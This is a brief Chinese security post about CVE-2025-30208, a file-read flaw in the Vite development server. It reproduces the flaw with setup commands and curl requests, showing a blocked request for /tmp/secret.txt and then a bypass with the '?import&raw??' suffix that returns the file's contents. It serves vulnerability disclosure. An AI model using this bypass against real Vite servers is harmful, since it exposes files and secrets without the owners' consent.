vite 任意文件读取漏洞 CVE-2025-30208

原创 security 网安守护 2025-03-26 23:43

$ npm create vite@latest$ cd vite-project/$ npm install$ npm run dev$ echo “top secret content” > /tmp/secret.txt# expected behaviour$ curl “http://localhost:5173/@fs/tmp/secret.txt”         

403 Restricted

     

The request url "/tmp/secret.txt" is outside of Vite serving allow list.# security bypassed$ curl “http://localhost:5173/@fs/tmp/secret.txt?import&raw??”export default “top secret content\n”//# sourceMappingURL=data:application/json;base64,eyJ2…